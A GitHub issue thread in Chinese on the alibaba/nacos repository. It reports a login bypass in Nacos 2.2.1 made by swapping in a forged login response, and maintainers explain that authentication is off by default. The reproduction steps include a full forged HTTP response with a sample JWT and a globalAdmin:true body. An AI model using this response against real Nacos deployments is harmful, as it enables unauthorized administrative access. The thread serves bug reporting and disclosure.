### ISSUE TITLE
nacos登陆绕过

### ISSUE THREAD

**Issue by laohuan12138** [alibaba/nacos#10191]
**Describe the bug**
2.2.1版本修改了默认的key，但发现即使修改了key，也能绕过账户密码登陆登陆系统。

**Expected behavior**
按道理只有正确的账号密码或正确的key生成的jwt才能登陆系统

**Actually behavior**
实际上我随便使用任意账户，通过修改返回包即可任意登陆系统

**How to Reproduce**
1.输入任意账户
![image](https://user-images.githubusercontent.com/42142726/227587823-15e05782-d107-4151-86c0-f8bdae8d96bf.png)
2.拦截返回包，替换返回包为以下内容
```
HTTP/1.1 200 
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTg5MzQyNzIwMH0.DqZpCR2KkU7ztZJL0eAUl8YFYHo8Q2jh94N16KgOSs0 
Content-Type: application/json;charset=UTF-8
Date: Wed, 08 Mar 2023 06:43:16 GMT
Connection: close
Content-Length: 181

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTg5MzQyNzIwMH0.DqZpCR2KkU7ztZJL0eAUl8YFYHo8Q2jh94N16KgOSs0","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}
```
![image](https://user-images.githubusercontent.com/42142726/227588078-64aa1855-b4cc-48bc-a1b9-1a49eb6fcdfa.png)
![image](https://user-images.githubusercontent.com/42142726/227588246-51be13c7-b434-495a-8710-b4cd712fda3b.png)
这个jwt随便什么值都不影响
3.放包，登陆成功
![image](https://user-images.githubusercontent.com/42142726/227588591-f909481a-23b5-4182-8ee1-5a55c8f09732.png)

**思考**
所以这是bug还是我配置错误呢?

**Comment by 985492783** [comment]
原因是2.2.1默认关闭鉴权
我觉得还是默认开启好一点，因为很多用户觉得强制配secretKey就等于开鉴权了，会产生误导 @KomachiSion

**Comment by laohuan12138** [comment]
感谢，原来是鉴权的问题




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "alibaba/nacos"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2023年3月25日(星期六) 上午9:14
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [alibaba/nacos] nacos登陆绕过 (Issue #10191)





 
原因是2.2.1默认关闭鉴权
 我觉得还是默认开启好一点，因为很多用户觉得强制配secretKey就等于开鉴权了，会产生误导 @KomachiSion

**Comment by KomachiSion** [comment]
> 原因是2.2.1默认关闭鉴权 我觉得还是默认开启好一点，因为很多用户觉得强制配secretKey就等于开鉴权了，会产生误导 @KomachiSion

下个版本会去除掉强制配secretKey，取消目前强依赖的登陆页。
